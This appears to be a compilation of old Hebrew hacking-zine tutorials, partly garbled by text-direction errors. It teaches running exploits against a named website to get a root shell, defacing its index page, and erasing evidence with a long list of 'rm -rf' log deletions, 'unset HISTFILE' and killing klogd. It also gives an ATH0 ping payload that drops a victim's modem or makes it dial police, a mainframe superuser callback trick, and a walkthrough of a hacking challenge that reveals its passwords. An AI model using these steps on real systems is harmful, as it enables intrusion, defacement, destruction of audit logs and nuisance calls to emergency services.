‫)אני לא בטוח שחובה לרשום את הפורט אבל אני בטוח שזה הפורט של חשבון‬
‫השאלל(‬
‫אוקי עכשיו את יכולים להיכנס לחשבון שלכם עים הסיסמא והיוזר שרשמתה את‬
‫עצמך‪.‬‬
‫*********************************************************************‬
‫************************************************‬
‫עים אתה מבין בלינוקס זה אמור להיות מוכר בשבילך אבל עים אתה לא תעקוב‬
‫אחריי ותעשה כמוני!!!!!‬
‫שלב‬
‫‪-------------------------------------------------------------------:3‬‬
‫‪-------------------------------------------‬‬
‫טוב אז עכשיו אתה צריך להשיג את האקספלויט שמתאים למערכת ולפתוח אותו‬
‫אתה‬
‫כנראה תראה את קוד המקור שתוכנת)בפרל או בסי(‬
‫לחיצה ימנית על העכבר תעשה בחר הכול ‪,‬עוד פעם לחיצה ימנית ותיבחר בהעתק‪.‬‬
‫תחזור לטלנט לחשבון שאלל שלך שלך ותילחץ שם )קונטרול‪+‬שיפט לקריאה נכונה‬
‫של‬
‫האנגלית(‬
‫*‪*/vi is a text editor/‬‬
‫‪<vi <exploit name> <press enter‬‬
‫כעיקרון אתה יכול לפתוח את זה בכול שם שאתה רוצה אבל תשים לב שבסוף יהיה‬
‫הסיומת של הסוג‬
‫של האקספלויט עים זה למשל האקספלויט תוכנן בפרל אז הסיומת תהיה‪:‬‬
‫‪blabla.pl‬‬
‫ובשפת סי זה יהיה‪:‬‬
‫‪blabla.c‬‬
‫ה ‪ vi‬זה טקסט אדיטור שפועל תחת מערכת לינוקס‪ ,‬טוב אחרי שנכנסו אליו‬
‫תקישו‬
‫‪ i‬זה יכניס אותנו למצב של אינסרט שיהיה אפשר‬
‫להכניס לתוכו את מה שסימנו מקודם‪.‬‬
‫עכשיו לכו בטלנט לאדיט ותילחצו פסט)הדבק(‬
‫‪edit>past‬‬
‫עכשיו האקספלויט מועתק מתי שזה גומר תילחצו )‪) (ESC‬המקש מיצד שמאל‬
‫למעלה(‬
‫זה יפנה אותך למצב שאתה יכול להקיש פקודות עכשיו תילחץ שיפט‪+‬נקודתים‬
‫ותיצור ‪:‬‬
‫עכשיו בתחתית המסך יופיע‬
‫‪ :‬עם סמן לידו עכשיו תילחץ ‪ wq‬זה יצא מהעורך והקובץ ישמר‪.‬‬
‫אתה יכול לבדוק עים זה נוצר עים הפקודה ‪. ls‬‬
‫טוב עכשיו יש לנו אקספלויט שמוכן להרצה ‪.‬‬
‫*********************************************************************‬
‫********************‬
‫אבל איך משתמשים איתו? ואיך להפעיל אותו ועוד הרבה סימני שאלה‬
‫>>>>>???????????>>?????????<<<<<>>>>??????<‬
‫שלב‬
‫‪--------------------------------------------------------------------4‬‬
‫‪----------------‬‬
‫*********************************************************************‬
‫****************‬
‫טוב עכשיו תקישו בתיבת הפקודה)תעשו קונטרל‪+‬שיפט כול פעם שיש אנגלית יותר‬
‫אני לא יזכיר(!!!!!!!!!!)ככה תפעילו אקספלויט שתוכנן בפרל(‬
‫פקודה מיספר ‪1‬‬
‫הפיל זה השם של האקספלויט‬ ‫‪<chmod 732 <file‬‬
‫לא חשווב כרגע מה היא עושה זה קשור להרשאות אבל תקישו את הפקודה הזאת‬
‫בספרייה של האקספלויט‪.‬‬
‫פקודה שנייה‬
‫הפיל זה השם של האקספלויט‬ ‫‪<file>/‬‬
‫מהפקודה הזאת אתה תקבל פלט שמסביר לכה איך להישתמש באקספלויט אתם כנראה‬
‫תקבלו פלט כזה‪:‬‬
‫‪<Usage: <filename><host><command‬‬
‫‪and then it will exit.What this is telling you is how to use the‬‬
‫‪exploit, it's telling you to type in the‬‬
‫‪filename followed by the host (anysite) and‬‬
‫‪the command (the command‬‬
(you want executed
‫לא תמידזה יציג את הפלט הזה ומי שמבין מומלץ לו לעבור בכלל על קוד‬/*
‫המקור‬
*/‫וליראות איך מפעילים ומה הוא עושה‬
(‫אז בוא נגיד שאני רוצה לפתוח חשבון שאלל )על האתר שאני רוצה לפרוץ‬
(‫ )זה יוצר שאלל‬bin/sh/ ‫אז הפקודה עומדת להיות‬
::::‫טוב איך אנחנו עומדים לעשות את זה‬
‫הפיל זה השם של האקספלויט‬
<type ./<filename> <host> <command

it will be ./filename www.hizbulla.net
/bin/sh . Now the ./ thing
means the
current directory, don't worry about this
unless you know Unix or
Linux, but you need this to
.execute the exploit
So there you go, you now can execute a .pl exploit, but now
you must
:learn how to execute a .c exploit so you do this as follows
*********************************************************************
*******************************************************************
<gcc <filename.c> -o <filename .1

where filename.c is the exploit with the
extension of .c and the
filename> is what you want the>
actual program to be (usually the exploit's
name without the
c extension). This command if you.
haven't figured it out alread compiles the .c
script to binary file
.(an executable file)
(‫טוב מה קורה פה למי שלא הבין באנגלית אנחנו מקיפלים אותו)את האקספלויט‬
.‫ויוצרים אותו כקובץ חדש שיהיה אותו שם רק בלי הסיומת‬
‫עכשיו חוץ מהקטע הזה הכול דומה לחלק הראשון אז אני ישים את זה באנגלית‬
‫את‬
: ‫ההסבר‬
*********************************************************************
*******************************************************************
<type ./<filename> <enter .2
again where file is the actual .pl exploit,
this actually runs the
file, this usally gives you a format of
what the file is looking for, for instance you
get an output
:similiar to this
<Usage:<filename> <host> <command
And then it will exit. What this is telling
you is how to use the
exploit, it's telling you to type in the
filename followed by the host (yoursite) and
the command (the
command you want executed), so
let's just give you a shell account on your
machine, so the command
will be /bin/sh (this executes
(a shell
<type ./<filename> <host> <command .3
it will be ./filename www.hizbulla.net ,
/bin/sh <enter>. Now the
thing means the /.
current directory, don't worry about this
unless you know Unix or
Linux, but you need this to
.execute the exploit
*********************************************************************
*******************************************************************
.‫טוב עכשיו אתם יודעים איך מריצים אקספלויטים‬
:‫הערות‬
‫בשביל להריץ את האקספלויט אתם יכולים גם לעשות זאת דרך מהדר רגיל שלי‬.1
‫סי‬
.‫או פרל‬
‫ ותעתיקו את הקובץ‬cp ‫אתם יכולים להריץ עוד פקודות חוץ מיצירת שאלל כמו‬.2
.‫של הסיסמא‬
‫החלק הקשה הוא במציאת האקספלויט המתאים אתם צריכים לחפש כמה שיותר‬.2
!!!‫חדש‬
.‫ אקספלויטים עד שתפרצו‬10 ‫יכולים לקחת לכם כ‬.3
.‫זה שווה את המאמץ‬.4
‫בפעם הבאה אני ילמד שיטה נוספת לפרוץ לאתר מקווה שלמדתם משהו שלא‬
!!!!!!!‫ידעתם‬
have some fun
ֱ‫להערות והארות כנסו לערוץ שלי במיר‬

‫ק‬
OpleMidl
‫ברשת‬
----------------------‫דלנט‬
---------------------------******************************
************************
!!!‫בפעם הבאה אני ילמד על‬
Break Site, The Cracker Way
‫אז שווה לחכות‬
/???????????????????????unitl the next time by by
yours
MiDL
‫********************************כול הזכויות שמורות ל‬
**********************************************************‫מטריקיס‬
MiDL JUST 4 MY CHANNEL ON IRC ‫ניכתב ע"י‬
:‫עוד תיקון בקשר למה שטיסל אמר‬
A DDOS (Distributed Denial Of Service) is actually an attack on your

computer, it usually reboots and/or freezes it. DDOS attacks (also
known
(as Just DOS attacks
-Break a Site, The CWay
‫******************************************אקספלוי‬
(C)***********************************‫ט‬
(part 2 from 3)
!!!!!!!!!!!!Break into site, The Cracker Way: by MiDL
‫‬ ‫"‪"the young man struggles on he's known‬‬
‫**********************************************************‬
‫‪#OpleMidl‬‬ ‫לא הבנתם משהו‪,‬לא הצליח לכם‪,‬רוצים לדבר איתי‪ ,‬כנסו לערוץ‬
‫במירק בשרת של ‪(dalnet(irc.dal.net)(6667‬‬
‫‪!!!!!!!your all invite‬‬
‫*********************************************************************‬
‫******************‬
‫טוב יכול להיות שאני יטעה אז עים תשימו לב למשהו תרגישו חופשיים לצור‬
‫איתי‬
‫***‬ ‫קשר כנסו‬
‫לערוץ שלי בדלנט אני נימצא שם הרבה ביחוד בין ‪ 9‬ל ‪11‬‬
‫***‬ ‫בלילה‪!......................‬‬
‫*********************************************************************‬
‫******************‬
‫הכתבה הזאת היא המשך לרישונה בשביל להבין אותה תיצתרכו ליקרוא את הכתבה‬
‫הקודמת על הסקריפט קידיס‪.‬‬
‫טוב בוא ניראה איך קרקר יפרוץ אתר שהוא רוצה ליפרוץ דבר ראשון הוא ישיג‬
‫את‬
‫הפרטים על האתר שהוא רוצה לפרוץ כמו על איזה מערכת הוא רץ מיספר אי פי‬
‫כמובן זה בסיסי בהתחלת כול פריצה בכול דרך אפשרית נזכיר לכם שאפשר ללכת‬
‫לכול מיני אתרים שיעשו את זה מצויין כמו‪:‬‬
‫‪www.netcraft.com‬‬
‫עכשיו הוא יעשה פורט סקאן על האתר בשביל לבדוק איזה תוכנות רצות עליו‬
‫ואיזה פורטים פתוחים‬
‫*‪/‬תוכל להשיג פורט סקננאר באתרים שונים פורט סקאן טוב זה פורט שלא רק‬
‫יראה‬
‫לך איזה פורט פתוח הוא גם יראה לך‬
‫‪ port scanner‬טובים באתרים‬ ‫איזה תוכנה מישתמשת בפורט הזה תוכל להשיג‬
‫כמו ‪www.hackres.com,www.hackersclub.com‬‬
‫*‪/‬‬
‫הפורט סקאנר שאני מיתשמש איתו קוראים לו ‪ portscan‬וזה רץ תחת וינדוס‬
‫בלינוקס אני מישתמש ב ‪nmap‬‬
‫עים הפורט סקאנר שלך לא אומר לך איזה תוכנה רצה ומה הגירסא שלה פשוט‬
‫טטלנט‬
‫אל הפורט נגיד שאני רוצה לדעת‬
‫‪25‬‬ ‫איזה גירסא של סאנד מיל מישתמש האתר של החיזבללה אז אני יעשה ככה‬
‫‪ telnet hizbulla.net‬אני לא בטוח שיש כזה אתר‬
‫אבל הבנתם את הכוונה אני מקווה‪.‬‬
‫עכשיו מתי שאתה יודע איזה תוכנות רצות על האתר את הפורט של כול אחד ואת‬
‫הגירסא אנחנו מתחילים לחפש אקספלויטים‬
‫לכול תוכנה ותוכנה שרצה על השרת *‪/‬שימו לב להבדל בין הדרכים של הקרקר‬
‫לסקריפט קידיס שבשיטה של הסקריפט הוא מחפש רק למערכת הפעלה לעומת הקרקר‬
‫שמחפש‬
‫לכול תוכנה שרצה על השרת וזה מגדיל את הסיכויים שלו ליפרוץ בהרבה‪*/‬‬
‫עכשיו אנחנו נחפש את כול הדברים שאנחנו יכולים למצוא על התוכנות שרצות‬
‫על המערכת על הגירסאות על פורטים על הכול‪..‬משהו שיתן לנו גישה כרווט‬
‫נריץ‬
‫אותו ונקבל גישה‪:‬‬
‫אחרי שהקרקר ישיג גישה כרווט הוא יחפש את קובץ האינדקס ככה‬
‫‪find index.html‬‬
‫זה יתן לו את המיקום של איפה הקובץ הזה נימצא בדרך כלל הוא נימצא בה‬
‫‪ home/httpd/html/‬אז הוא יכנס לתקייה הזאת ‪/cd home/httpd/html‬‬
‫עכשיו הוא יקיש ‪ ls‬וישים לב שהקובץ נימצא שמה *‪/‬לקרקרים יש להם כמין‬
‫מינהג לא למחוק את הקובץ אינדקס הם ישנו אותו למשהו אחר )לכו תבינו(‪*/‬‬
‫ככה‪:‬‬
‫‪mv index.html home.html‬‬
‫עכשיו הם יצרו אחד משלהם ככה‪:‬‬
‫‪vi index.html‬‬
‫עכשיו פתחנו את העורך ויצרנו קובץ שקוראים לו כך ‪ index.html‬תכינו את‬
‫הקוד‬
‫‪ html‬על המחשב שלכם ורק תעתיקו אותו לתוך הקובץ שאתם יוצרים כך‪:‬‬
‫מתי שאתם בתוך העורך תילחצו ‪ i‬זה יביא אותנו למצב שאפשר להדביק עכשיו‬
‫תעתיקו את הקוד שלכם לתוך העורך אחרי שזה גמר‬
‫תילחצו על ‪ esc‬ואז תגיעו למצב שאפשר לתת פקודות אתם תילחצו שם ‪ wq:‬זה‬
‫ישמור ויצא‪.‬‬
‫עכשיו פרצנו לאתר בלי לגרום הרבה נזק אבל בוא נידאג שלא יתפסו אותנו‪.‬‬
‫שלב ראשון אנחנו ניבדוק עים יש לוגים של האתר הזה שנישמרים גם על שרתים‬
‫אחרים חוץ מזה‪,‬אנחנו ניבדוק את זה כך‪:‬‬
‫‪cat /etc/syslog.conf‬‬
‫הפקודה הזאת מציגה תוכן של קבצים אז הפעלנו אותה על הקובץ‬
‫‪syslog.conf‬‬
‫שבו זה מראה איפה עוד נישמרים לוגים אז אם ניראה שם שורה שלא מתחילה ב ‪#‬‬
‫וכתוב שם איפי אז נפרוץ גם לאיפי שכתוב שם‬
‫ונימחק מישם גם את הלוגים‪.‬‬
‫אוקי עכשיו אנחנו עומדים לימחוק את כול הלוגים שנימצאים על השרת אנחנו‬
‫עושים את זה כך‪/*:‬איפה שרשום אנטר זה אומר שתירשמו את הפקודה ואחרי זה‬
‫תילחצו‬
‫אנטר כמובן‪*/‬‬
‫‪shift+cntrl‬לקריאה נכונה‬
‫‪<cd / <enter‬‬
‫‪<rm -rf /tmp/log <enter‬‬
‫‪<rm -rf /usr/log <enter‬‬
‫‪<rm -rf /var/log <enter‬‬
‫‪<rm -rf /var/logs <enter‬‬
‫‪<rm -rf /etc/log <enter‬‬
‫‪<rm -rf /usr/adm/log <enter‬‬
‫‪<rm -rf /usr/adm/syslog <enter‬‬
‫‪<rm -rf /tmp/var/log <enter‬‬
‫‪rm -rf /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog‬‬
‫‪<<enter‬‬
‫‪rm -rf /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages‬‬
‫‪<<enter‬‬
‫‪rm -rf /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog‬‬
‫‪<<enter‬‬
‫‪rm -rf /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog‬‬
‫‪<<enter‬‬
‫‪<rm -rf /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp <enter‬‬
‫‪<rm -rf /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx <enter‬‬
‫‪<rm -rf /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp <enter‬‬
‫‪<rm -rf /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx <enter‬‬
‫‪<rm -rf .bash_history <enter‬‬
‫‪<ln -s /dev/null .bash_history <enter‬‬
‫‪<killall -HUP inetd <enter‬‬
‫‪<unset HISTFILE <enter‬‬
‫‪<killall -9 klogd <enter‬‬
‫‪ ./‬אים תקבל הודעה שאומרת שהקובץ לא‬

‫נימצא‬
‫זה אומר שהוא לא קיים ואין לנו מה לידאוג אני ממליץ לכם להריץ חיפוש‬
‫שתחפשו בו עוד קיבצי לוגים לאנונימיות מוחלטת!!‪./‬‬
‫ועוד משהו אחרון אים איזשהוא לוג פשוט לא מסכים להימחק זה כנראה ביגלל‬
‫שאין לך הרשאה כזאת אז בתור רווט אנחנו נסדר לו‬
‫הרשאה שכן הוא יוכל להימחק ככה‪:‬‬
<chmod 700 <logname
‫ אבל זה ממש לא משנה לכם אים אתם לא‬000 ‫כניראה שלפני זה ההרשאה שלו היתה‬
.‫מבינים בלינוקס ובהרשאות‬
.‫ תיכנסו לאתר ותהנו ממה שעשיתם‬cntrl+d ‫טוב אז עכשיו תצאו החוצה‬

.‫מילות סיכום‬
In the hacking community, crackers are acutally looked down on,
because
sure they can hack, but they are often lazy and they usally get
caught
,just as much as script kiddies, they also cause damage to systems
which is not really liked in the community. Also they lack the no
how and
,knowledge about programming, hardware, grahpics, networking, TCP/IP
the inernet, and just plain technology to have a serious conversation
to
,hackers, and sadly the word hacker is mistaken by the word cracker
most crackers are called hackers, because they read a text paper, and
learned how to deface systems, great job, and some skills too. For
instance, anybody can read this text file and learn to hack, but it
takes a
hacker to be able to take the info in this text file and pioneer it
into
something good, and make new exploits and show people how to secure
/..their systems
ֱ‫להערות והארות כנסו לערוץ שלי במיר‬

‫ק‬
OpleMidl
‫ברשת‬
----------------------‫דלנט‬
---------------------------******************************
************************
!!!‫בפעם הבאה אני ילמד על‬

Break A Site, The Hacker Way
‫אז שווה לחכות‬
unitl the next time by by???????????????????????/
yours
MiDL
********************************‫כול הזכויות‬
‫@שמורות‬Midl**********************************************************
war war war war war war war awr war war awr awr awr awr awr awr awr
awr
awr awr awr awr awr war ar a war awr war awr
‫שליטה במודם‬
------------------------
‫‪ATH0 bug by spy[D]ir+++‬‬
‫‪------------------------‬‬
‫‪.1‬מה זה ?‬
‫‪.2‬איך לנצל ?‬
‫‪------------------------‬‬
‫‪? ma zeee.1‬‬
‫‪------------‬‬
‫זה באג שפועל על כל מודם )בערך ‪ 90‬אחוז( שלא קשורים בכבלים אי די אס אל‬
‫וכו‪...‬רק רגילים בקיצר‬
‫מה שזה עושה זה גורם למודם לנתק את עצמו‪...‬אפשר לגרום לו לעשות דברים‬
‫מגניבים גם אחרי הניתוק למשל עם הפקודה‬
‫‪ATH0,,,D155+++‬‬
‫זה יגרום למודם לנתק את עצמו ‪ ,‬לחכות ואז לחייג ל ‪155‬‬
‫‪(:‬‬
‫מה שעולה קצת כסף וגם מעצבן אם גורמים לו להתקשר למשטרה‪....‬בחו"ל‪(:....‬‬
‫‪How To Exploit.2‬‬
‫‪-----------------‬‬
‫מלינוקס זה פשוט מאוד‪....‬מווידוס אתם פשוט משתמשים בתוכנה שלי‬
‫מלינוקס‪....‬‬
‫פותחים חלון‬
‫‪console,bash‬‬
‫וכותבים‬
‫‪ping -c 5 -p 2b2b2b415448300d ip‬‬
‫זה ינתק אותו‪...‬‬
‫כל הזיבול שכתוב למעלה זה‬
‫‪ATH0+++‬‬
‫בהקס‬
‫ובוויןדוס תשתמשו בתוכנה במצורפת‪...‬‬
‫מה שהבאג אומר זה צא למצב פקודות‬

‫‪+++‬‬
‫תקשיב‬
‫‪AT‬‬
‫תנתק‬
‫‪H0‬‬
‫זהו‪....‬הנה כמה קודים ללינוקס שיעשו דברים נחמדים‬
‫‪2B2B2B415448302C2C2C4454313434‬‬
‫מתקשר ל ‪144‬‬
‫‪2B2B2B415448302C2C2C4454313030‬‬
‫מתקשר למשטרה‬
‫‪2B2B2B415448302C2C5A6E‬‬
‫עושה ריסט למודם‬
‫איך לפרוץ למיין פריים‬
‫טקסט קצר עלידי ספידיר‪...‬מה שגם סיבך אותי בצרות‪....‬‬
‫===========‬
‫איך לפרוץ למייןפריים‬
‫===========‬
‫‪(1‬בסיס‬
‫‪(2‬הבעיה‬
‫‪(3‬הפתרון‬
‫‪.1‬מה זה מיין‪-‬פריים ?‬
‫‪-----------‬‬
‫מיין פריים זה מחשב שהוא שרת שמאכסן מידע לרוב בארגונים גדולים‬
‫חברות ממשלה וכו‪ ...‬הם מאכסנים מידע ורק משתמש אחד )רוב הפעמים( יכול‬
‫להכנס ולשנות \ לצפות במידע הזה‪ ,‬למשתמש קוראים סופר יוסר ואני לא‬
‫מתכוון כמו של מחשב נייד‪...‬‬
‫על המחשב יש מידע על הסופריוסר כולל טלפון למחשב שלו‪.‬‬
‫)‪(superuser‬‬
‫‪.2‬הבעיה‬
‫‪--------‬‬
‫שאתה מתקשר למיין פריים דרך המחשב עם תוכנת היפר טרמינל )זה בא עם‬
‫הווידוז( אתה מקבל משהו כזה‪:‬‬
‫‪--------------------------‬‬
‫‪Welcome to the mainfream‬‬
‫‪:user‬‬
‫‪--------------------------‬‬
‫זהו בלי ססמא‪ ...‬אתה מקיש לך סופריוסר‪...‬מייד המיין פריים ינתק ואז‬
‫יבדוק את הפרטים של הסופר יוסר ‪ ,‬יתקשר לו למחשב והסופר יוסר מחובר‪....‬‬
‫אבל אתם צריכים שזה יתקשר אליכם כדי שתוכלו לשלוט בו ובמידע שבו‬
‫‪.3‬פתרון‬
‫‪--------‬‬
‫זה קל‪...‬‬
‫אתם מתקשרים למיין פריים דרך היפר טרמינל )תדאגו שיש גם טלפון רגיל‬
‫לידכם(‬
‫מקישים סופריוסר המחשב מייןפריים ינתק אבל אתם לא!‬
‫מייד שזה מנתק )או שנייה ממש לפני( תרימו את הטלפון יתשמיעו צליל ארוך‬
‫של קו )צריך להקליט ולהשמיע באיכות דיגיטאלית(‬
‫המיין פריים יחשוב שיש קו וכאילו ינסה לחייג לסופר יוסר למחשב ‪ ...‬אחרי‬
‫שהוא מפסיק לחייג אתם אומרים להיפר טרמינל אצלכם להרים את הקו ולחכות‬
‫לשיחה נכנסת ומייד אתם סוגרים את הטלפון שאתם מחזיקים ביד‪....‬‬
‫ויהיה בינך לבין המיין פריים קשר ותוכל לשלוט בו בטור סופריוסר‬
‫)‪(hahaha‬‬
‫אני לא ממליץ )גם מסיבה אישית( לעשות כל דבר כזה ובלה בלה בלה קפצו לי‬
‫‪and have a nice day‬‬
‫‪.spy[D]ir‬‬
‫=================‪=================EOF‬‬
‫מבחו הארי מרפי חלק א'‬
‫איך לעבור את מבחן ההאקינג של הארי מרפי!?!?‬
‫‪--------------------------------------------‬‬
‫במדריך זה אני יסביר לכם איך לעבור את מבחן הארי מרפי משלבים ‪ 1‬עד ‪4‬‬
‫ובחלק השני אני יסביר את השאר!‬
‫השלב הראשון‪:‬‬
‫מיקום‪http://homepage.eircom.net/~level12/11.html :‬‬
‫שלב קל מאוד כל מה שצריך לעשות זה לבדוק בקוד‪ ...‬אבל זה לא כל כך‬
‫פשוט‪ ...‬אוי ואבוי חסמו את הכפתור הימני אז הולכים ל ‪ VIEW‬ל ‪SOURCE‬‬
‫ורואים שם שהדף הראשי הוא ‪ HACK1.HTML‬אז כותבים את הכתובת ורק משנים את‬
‫שם הדף! עכשיו תנסו לעשות כפתור ימני??? לא! עדיין אי אפשר! תכנסו שוב‬
‫ל ‪ VIEW‬שוב ל ‪ SOURCE‬והנה ה ‪ SOURCE‬לפניכם‪...‬‬
‫חפשו שם את המקום שהוא משווה את מה שרשמתם לסיסמא האמיתית במקרה זה‬
‫בפונקציה הזאת‪:‬‬
‫ליישר לימין ואני לא יגיד את זה כל הזמן אז כל פעם שיש קוד תיישרו לימין‬
‫‪} ()function password‬‬
‫‪;("",':Ret=prompt('Please enter your password‬‬

‫‪} ("if(Ret=="123456‬‬
‫‪;'location='hack12.html‬‬
‫{ ‪} else‬‬
‫‪(".alert("Incorrect Password... That's a Sad Attempt‬‬
‫ומפה אנחנו מסיקים שהסיסמא היא ‪.123456‬‬
‫שלב שני‪:‬‬
‫מיקום‪http://homepage.eircom.net/~level12/yep123.html :‬‬
‫טוב‪ ...‬כאן זה לא מסובך אבל זה דורש הברקה‪ ..‬לא מחשבה אבל הברקה‪...‬‬
‫כל מה שצריך לעשות זה להסתכל בקוד ולראות שהסיסמא משתנה באופן רנדומלי‬
‫ונוצרת רק מחדש כל פעם שאתה נכנס לאתר‪...‬‬
‫אז נלך לקוד ונראה שהוא משווה את הסיסמא למשתנה ליתר דיוק למשתנה ‪DE4‬‬
‫‪(if (document.isnform.cmb.value != de4‬‬
‫נלך לשורת הכתובת ונכתוב‪:‬‬
‫‪(javascript:alert(de4‬‬
‫והופ‪ ...‬הנה הסיסמא קופצת לנו! ‪(:‬‬
‫הערה‪ :‬בחלק מהדפדפנים יעלה חלון שגיאה כאשר תעשו את השורה שזאת‪ .‬לאלו‬
‫שזה קורה יש ללחוץ לחיצה ימנית על החלון ולבחור את האפשרות‬
‫‪open frame in new window‬‬
‫ואז שוב לכתוב את השורה‬
‫שלב שלישי‪:‬‬
‫מיקום‪http://homepage.eircom.net/~level12/hk177.html :‬‬
‫השלב השלישי הוא הכי קל!‬
‫מה שאתם צריכים לעשות זה לקחת את שם המשתמש והסיסמא המוצפנת ולכתוב אותם‬
‫בקובץ ככה‪:‬‬
‫‪a101:Or5hCcebRcTV2‬‬
‫שם המשתמש הוא ‪ a101‬והסיסמא מוצפנת‪...‬‬
‫קחו קראקר )לא לא קרקר זה לא הפסקה יש עוד המון עבודה ‪ (:‬ותכוונו אותו‬
‫על פריצת הסיסמא‪...‬‬
‫אם תרצו שאני יחסוך לכם את העבודה אז הסיסמא היא ‪ ROOT‬אז לא צריך לחכות‬
‫הרבה שהקראקר יגמור כי בדרך כלל ‪ ROOT‬זה אחד הניסיונות הראשונים!‬
‫זהו רק תכתבו בשם המשתמש ‪ a101‬ובסיסמא ‪...ROOT‬‬
‫שלב רביעי‪:‬‬
‫מיקום‪http://homepage.eircom.net/~level12/xx.htm :‬‬
‫השלב הזה הוא שילוב מוזר בין גורמים‪ ...‬כמו שאתם שמים לב אין לכם ממש‬
‫הזדמנות להציץ בקוד בצורה רגילה בגלל שאם אתם לא כותבים את הסיסמא‬
‫הנכונה אתם עפים ישר החוצה‪...‬‬
‫מה עושים? שומרים את הדף על המחשב על ידי לחיצה על הלינק ושמירה בשם‬
‫תפתחו את האקספלורר ואת המסמך ותשתדלו שזה יהי הדף הראשון שנפתח זאת‬
‫אומרת שלא יהיה אפשר לעשות ‪ BACK‬למרות שזה לא משנה כי תמיד אפשר לשנות‬
‫זאת בקוד!‬
‫בקוד תראו שהסיסמא בנויה באופן מאוד מוזר היא עשויה אותיות ממקבץ אותיות‬
‫אשר מחוברות בדרך מוזרה‪...‬‬
‫הערה‪ :‬זאת לא סיסמא רנדומלית רק סיסמא מוצפנת!‬
‫תכתבו כמו בשלב שתיים‪:‬‬
‫‪(javascript:alert(STRING2‬‬
‫כי בקוד רואים שהוא משווה למשתנה בשם ‪...STRING2‬‬
‫‪(if (name ==STRING2‬‬
‫זהו והנה לכם הסיסמא!‬
‫‪bcde‬‬
‫כל הזכויות שמורות ל ‪ © InPHo‬אין להעתיק‪ ,‬לגנוב או להפיץ בלי רשות!‬
‫מבחן הארי מרפי חלק ב'‬

‫היי זה שוב אני!!!‬
‫בחלק הזה של המדריך אני ילמד אתכם את שלבים ‪!5-7‬‬
‫שלב ‪:5‬‬
‫מיקום‪http://homepage.eircom.net/~level12/cong.html :‬‬
‫אוקיי אז פה לא הבנתי את הקטע כל כך‪...‬‬
‫הסיסמא פה היא ‪ PRICK‬כי פשוט ניסיתי את כל המילים שכתובות שם‪...‬‬
‫מה שהם עשו זה שאתה כותב את הסיסמא וזה מוסיף לו סיומת ‪ HTML‬ואם מה‬
‫שכתבת נכון אתה תגיע לדף אם לא לא תגיע לשום מקום‪...‬‬
‫הם פשוט נותנים לך לבחור בין ‪ 4‬מילים שאחד מהם הוא הסיסמא‪.‬‬
‫שלב ‪:6‬‬
‫מיקום‪http://homepage.eircom.net/~level12/prick.html :‬‬
‫טוב זה קצת מוזר אבל קל‪...‬‬
‫מה שהם עשו פה זה שלחו לפונקציה ארבע ערכים‬
‫‪text2.value‬‬
‫&‪;quot;fuck&quot‬‬
‫‪text1.value‬‬
‫&‪;quot;you&quot‬‬
‫ואז הפונקציה משווה אם הערך הראשון והשני שווים והערך השלישי והרביעי‬
‫שווים אז הכל נכון!‬
‫אז מה עושים?‬
‫רואים את הראשון? זה התיבת טקסט של השם משתמש‪ ,‬רואים את השלישי? זה‬
‫התיבת טקסט של הסיסמא‪...‬‬
‫עכשיו הפונקציה משווה את שם המשתמש עם השורה השנייה ואת הסיסמא עם השורה‬
‫האחרונה!‬
‫שם משתמש‪fuck :‬‬
‫סיסמא‪you :‬‬
‫זהו‪ ...‬פשוט וקל!‬
‫שלב ‪:7‬‬
‫מיקום‪http://homepage.eircom.net/~level12/ab12345.html :‬‬
‫זה הכי פשוט! )זה אני או שהרמה פה יורדת במקום לעלות??? ‪(:‬‬
‫מציצים בקוד הצצה חפוזה ‪ (:‬ורואים את הפונקציה הזאת‪:‬‬
‫‪} (function Spikeman_password(form‬‬
‫‪} ("if (form.ID.value=="location‬‬
‫‪} ("if (form.pass.value=="password‬‬
‫‪"location="909.html‬‬
‫}‬ ‫‪else‬‬
‫‪(".alert("Sorry " +form.ID.value+ ", wrong password‬‬
‫{‬
‫{ ‪} else‬‬
‫‪("alert("Invalid Name‬‬
‫‪"location="fail.htm‬‬
‫הדף מעביר לפונקציה את הפורם )את השם משתמש והסיסמא( והפונקציה בודקת‬
‫אותם‪:‬‬
‫אם שם המשתמש = ‪ location‬והסיסמא = ‪ password‬אז זה מאשר נכון מצחיק ? ‪(:‬‬
‫‪ - ("if (form.ID.value=="location‬בודק שם משתמש‪.‬‬
‫‪ - ("if (form.pass.value=="password‬בודק סיסמא‪.‬‬
‫זהו עד כאן המדריך אני מקווה שאני יוציא גם מדריך לשלבים ‪ (: 8-12‬שיהיה‬
‫לכם בהצלחה ואני מקווה שגם למדתם משהו ולא רק סתם עברתם את זה כי אחרת‬
‫זה לא שווה!‬
‫עד הפעם הבאה‪...‬‬
‫ביי‪...‬‬
‫‪InPHo‬‬
‫כל הזכויות שמורות ל ‪ © InPHo‬אין להעתיק‪ ,‬לגנוב או להפיץ בלי רשות!‬
‫מבחן הארי מרפי חלק ג'‬

‫הנה התוספת שלי‪...‬‬
‫איך לעבור את מבחן מרפי שלב ‪!!!8‬‬
‫שלב ‪:8‬‬
‫מיקום‪http://homepage.eircom.net/~level12/909.html :‬‬
‫>‪embed src="swf.swf" quality=high‬‬
‫בשורה שלמעלה אנחנו רואים מה מקור קובץ הפלאש ‪swf.swf -‬‬
‫עכשיו נוריד אותו‪ ...‬מה זאת אומרת איך?‬
‫בשורת הכתובות נשנה את ‪ 909‬ל ‪) swf.swf‬כמובן בלי ה ‪(HTML‬‬
‫זהו עכשיו נוריד את זה ונפתח את זה ב‪ ....‬לא אחר מאשר נוטפאד‪...‬‬
‫כן כן הדבר הזה שאתם קואים את הטקסט הזה בו!‬
‫עכשיו תעשו חיפוש למילה ‪ PASSWORD‬תחפשו ליד זה איזה שהיא מחרוזת הגיונית‬
‫שמורכבת רק מאותיות‪...‬‬
‫אני הייתי צריך לחפש פעממים את המילה כדי להגיע למקום הנכון‪...‬‬
‫הסיסמא היא ‪notepadtxt‬‬
‫זהו! פשוט נכון?‬
‫מבחן הארי מרפי חלק ד'‬
‫אני חושב שאני יודע איך לעבור את שלב תשיעי של מרפי!!!‬
‫צריך לבנות קובץ טקסט עם כל הצירופים האפשריים )בערך שלוש מליון!(‬
